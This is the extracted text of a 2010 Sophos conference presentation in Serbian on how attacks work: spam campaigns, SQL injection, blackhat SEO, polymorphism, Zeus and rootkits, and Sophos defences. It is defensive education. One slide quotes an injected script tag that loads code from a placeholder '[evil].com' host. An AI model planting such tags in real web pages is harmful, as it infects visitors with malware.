Upload
itdogadjajicom
View
21
Download
2
Embed Size (px)
DESCRIPTION
Prezentacija "Anatomija napada – duhovi u mašini" koju je Vanja Švajcer održao na Sophos seminaru u maju 2010. godine.
Citation preview
Vanja Svajcer
Principal Researcher – Sophos
Beograd, 13 Maj 2010
Anatomija napada – duhovi u mašini
Šta radi SophosLabs?
Sakuplja pretnje
Analizira i klasifikuje
Kreira detekcije i otklanja pretnje
Objavljuje sveže definicije i informacije
Istraživanje i razvoj
Nešto više informacija videćemo kasnije
2
SophosLabs u samom centru
4
Anatomija napada
Postavljanje scenarija
Zlonamerni softver (Malware)
Tehnike napada
Proces analize i alati
Tehnologija zaštite
5
Tipovi malicioznog softvera
Virus
Trojanac
Crv (Worm)
Ko se nekada bavio pisanjem virusa?
Nema „standardnog“ pisca virusa, nema „standardnog“ motiva
za pisanje
Školarci
Srednjoškolci
Studenti
IT profesionalci
Uglavnom muškarci
Nikako A/V kompanije
Ko piše malver danas?
Virusi se retko viđaju, ali čini se da opet postaju popularni
U pitanju je novac
U osnovi se svodi na kriminal
( I dalje postoji tamo neki pegavi tinejdžer …)
10
APT
Advanced Persistent Threat
Moderan izraz za “targeted malware”
Mala veličina (oko 100k) i posebne namene
Nema pakovanja
Izgleda kao legitiman Windows fajl
Neovlašćeni prikriveni transfer podataka (Data Exfiltration)
Težak za uklanjanje
11
Email pretnje
Druga polovina 2008. bila je svedok
dramatičnog porasta malvera
u obliku priloga email-a
2009. taj trend se nastavlja,
nekoliko familija se širi agresivnim
masovnim spemovanjem
Iste stare taktike socijalnog inženjeringa
UPS/FedEx failed delivery
reports, Microsoft patches,
Airline e-tickets itd.
12
0% 10% 20% 30% 40%
ThreatMal/Bredo-A
W32/MyDoom-OTroj/Bredo-GTroj/Invo-Zip
Troj/BredoZp-CTroj/Agent-LGEMal/EncPk-KP
Mal/WaledPak-AMal/BredoZp-A
Mal/EncPk-JXOther
15.9%8.9%8.5%
5.8%5.4%4.8%4.7%
3.5%3.3%3.2%
36.0%
Top spemovani malver (2009)
Dominiraju ključne familije malvera
Bredo
Waled
Jednostavno
ali i dalje
radi!
Socijalni inženjering – Bredo
Mal/Bredo
Ista kampanja može obuhvatati brojne “različite” priloge
Socijalni inženjering – Zbot (aka Zeus)
Mal/Zbot
Bredo vs Zbot
Konkurencija između botova!!!
Bredo pokušava da onemogući bilo koji instalirani Zbot
Vrlo slično poput Netsky vs Bagle rata od pre par godina!!!
16
Email pretnje
Globalne spem zamke za praćenje spema
SAD usmerava više spema nego bilo koja druga pojedinačna
država
Kompromitovani računari ne samo što šire spem već
distribuiraju malver i
lansiraju DDoS napade
0% 10% 20% 30% 40% 50%
United StatesBrazilIndia
ChinaRepublic of Korea
TurkeyPoland
VietnamRussian Federation
SpainOther
15%
11%
5%
5%
5%
4%
4%
3%
3%
3%
42%
17
Web najdominantniji
99% inficiranih sistema su legitimni kompromitovani sajtovi
Sajtovi za napad
Botnet C&C korišćenjem HTTP
Napadi i dalje često počinju spemovanjem email-a
18
Napadi Web 2.0 aplikacija
Korak 1: preusmeravanje sa kompromitovanog sajta
Kompromitovani web sajtovi
Attacker-controlled
redirects
Payload
Attack site using
bundle of exploits
21
Kompromitovanje hostova
SQL injection
Hakeri koriste alate da identifikuju
stranice potencijalno ranjive na SQL
injection
Šalju maliciozne HTTP zahteve (Demo)
DBDB
DB
Malicious SQLinjection
SQL injection
SQL injection uzrokuje da baza podataka postane zabiberena
malicioznim skript tagovima
Kao rezultat, stranice na web serveru izgrađene od podataka
preuzetih iz baze takođe sadrže maliciozne skript tagove
<script src=http://[evil].com/file.js
<script src=http:/
<script src=http:/
<script src=http:/
<script src=http:/
<script src=http:/
<script src=http:/
<script src=http:/
SQL injection
Korisnik se kreće web sajtom
Maliciozni skript tag prikriveno učitava
skript sa udaljenog servera
Žrtva postaje inficirana malverom:
Asprox trojan
25
Demo SQLi + XSS
26
Novootkrivene inficirane stranice – april 2010
27
Blackhat SEO
Kompromitovani hostovi zasejani sa SEO-kitovima
Povećavaju rangiranje stranice
SEO trovanje
Pretraga po popularnim rečima
29
Blackhat SEO
30
Blackhat SEO
31
Demo Blackhat SEO
Vidljivost – sajtovi koji hostuju SEO-kitove
Korak 3: Preuzimanje sadržaja sa napadačevog sajta
Kompromitovani web sajtovi
Preusmeravanja koja
kontroliše napadač
Payload
Sajt za napad koristi
više kombinovanih ranjivosti
Web napadi
Izrađen korišćenjem
kupljenih kompleta alata
MPack, IcePack, GPack,
Neosploit, Eleonore, Yes
Konzola za upravljanje
Phishing
Otkriven: 19. oktobra 2009.
Najpogođenije države:
Francuska – 4%
SAD – 17%
Velika Britanija – 3%
Nemačka – 6%
Web napadi
Pregled po programima
za pregled Internet
sadržaja!
Polimorfizam sa
serverske strane
Procenat pogođenih:
MSIE – 12%
FireFox – 1%
Opera – 5%
36
Polimorfizam
37
Polimorfizam
38
Polimorfizam
39
Polimorfizam
40
Polimorfizam
41
Slabosti polimorfnog malvera
Poly-engine je deo koda
Može biti reverzovan od strane upornog istraživača
Mora biti dekriptovan u memoriji
Emulira programski kod dok se ne nađe prava varijanta
Detekcija može biti bazirana po proceduri dekripcije
42
Polimorfizam sa serverske strane
43
Polimorfizam sa serverske strane
44
Polimorfizam sa serverske strane
45
Polimorfizam sa serverske strane
46
Demo SSP
Korak 4: Napadni žrtve kroz ranjivosti, zarazi ih
Kompromitovani web sajtovi
Preusmeravanja koja
kontroliše napadač
Tovar
Sajt za napad koristi
više kombinovanih ranjivosti
Lažni AV profesionalizam
49
Video - scareware
Troj/MacSwp
50
51
Zeus (Zbot)
Komplet za kreiranje botneta i malvera za krađu informacija
Builder
Loader
Control panel
52
Demo Zbot
53
Zeus (Zbot) - tracker
54
Rootkitovi
Programi koji koriste različite tehnike da sakriju svoje prisustvo
na računaru
Trojanci
Legitimni programi?
Šta Rootkitovi rade?
Anti-Virus
skener
Operativni
sistemRootkit
Listanjefajlova
Memo.doc
Sales.xls
Phish.exe
Sophos.ppt
Memo.doc
Sales.xls
Phish.exe
Sophos.ppt
Listanjefajlova
56
Demo rootkit
57
Vrhunski rootkitovi
TDSS (TDL3)
MS10-015 update
Vrhunski rootkitovi – Sinowal (Mebroot)
Inficira MBR (poput starih boot sektor virusa)
Modifikuje OS loader da učita maliciozni drajver
Drajver sakriva maliciozni MBR (stealth)
Instalira prilagođeni mrežni stek
Sadrži backdoor (enkriptovana HTTP komunikacija)
Tovar – ubrizgava maliciozne DLL-ove
Pseudo-nasumično generisanje URL-ova za update (dnevni)
Hard disk
Rootkitovi – Sinowal (Mebroot)
BIOS
initializationMBR Boot loader
Early kernel
initialization
CPU Real mode
BIOS services
Kernel
initialization
CPU Protected mode
User process
Window servicesWindow services
MBR Boot loaderEarly kernel
initializationUser process
Sinowal
dropper
User process
Endpoint
securityRead
MBR
Sinowal geografsko širenje (Sinowal, Feb-Mar 2010)
61
Vrhunski rootkitovi budućnosti
Rootkitovi za virtualizaciju
Softver (Subvirt)
Uz pomoć hardvera (Bluepill, Vitriol)
Bootkitovi (eEye, vBootkit, Stoned)
SMM bazirani rootkitovi
Bios/EFI bazirani rootkitovi?
Rootkitovi za virtualizaciju
Hardver
Aplikacija 1
Aplikacija 2 VMM
OSg1 OSg2
OSRootkit za
virtualizaciju
Rootkitovi za virtualizaciju
Hardver
OSg3
Rootkit za virtualizaciju – maliciozni hipervizor
OSg2OSg1Domen 0
SophosLabs™
65
Pregled
50000
SophosLabs sistemi
67
Demo lab sistemi
68
Tehnologija zaštite
Inspekcija sadržaja (klasično skeniranje)
Detekcija na bazi ponašanja (HIPS)
Reputacija
Domen
Fajl
Životni ciklus familije malvera
Prvi član
porodiceAnaliza Detekcija TEST Objava
Sledeći
član
porodica
Karakteristike familije
Identične osnovne funkcionalnosti
Nove varijante mogu imati dodatne funkcionalnosti
Linije koda se ponovo upotrebljavaju
Nakon rekompilacije, nova varijanta je binarno različita
Tradicionalno skeniranje nije efikasno za proaktivnu detekciju
familije
Zahteva analizu na funkcionalnom nivou
Grafički prikaz aplikativnih zahteva
Spakovan -> Raspakovan
„Runtime behavioral“ zaštita
Nadopunjuje Behavioral Genotype
Proverava ponašanje procesa primenjeno na sistemu
Proverava sve pokrenute procese na znake malicioznih
modifikacija sistemskih objekata
Fajlove
Registry unose
Procese
Mrežne konekcije
Učitane drajvere
Registracija u run ključu
Uprošćena runtime arhitektura
Privileged – kernel mode
Non-privileged – user mode
- Pokreće se proces virus.exe... - Hmmm, OK. Skeniram na viruse… - Ništa nije pronađeno.- Virus.exe otvara registry run ključ...- Zanimljivo. Reci mi nešto više o tome.- Virus.exe se registruje u run ključ…- Hmmm, ne, to nije OK. Blokiraj
operaciju!!!- Operacija blokirana.- Hvala ti kernele!- Izveštavam o ponašanju.
Virus.exe
Buffer overflow zaštita
Generička tehnologija za detekciju zloupotrebe propusta
(uključujući tzv. zero day zloupotrebe)
Nadopunjuje Windows DEP
Detektuje različite buffer overflow napade
Stack
Heap
Return to lib C
Štiti Microsoft i ne-Microsoft procese, uglavnom sa klijentske
strane
Buffer overflow – uprošćena arhitektura
- Preuzimam fajl…- Zanimljivo, odakle dolaziš?- Internet Explorer programski kod.- OK.- Preuzimam fajl2...- Oh, ne opet. Odakle dolaziš?- Stack.- Oh, ne. Buffer overflow detektovan!!!- Suspendujem proces.- Prijavljujem ponašanje.
Iexplore.exe
77
Cloud computing
78
Cloud zaštita
Pretrage u realnom vremenu
Povratne informacije u realnom vremenu (zaštita zajednice)
Socijalno umrežavanje vezano za bezbednost
Premošćavanje prekida u zaštiti
Unapređenje vremena odziva
79
Proaktivno vs reaktivno
80
Zaključak
Malver postaje sve kompleksniji
Finansijska motivacija
Usmereni (targeted) malver može predstavljati izazov
Security zajednica ne gubi bitku
Stalno se razvijaju nove metode
Tehnologija ne predstavlja „srebrni metak“
Blog: http://www.sophos.com/blogs/sophoslabs
Twitter: http://twitter.com/sophoslabs
Pitanja?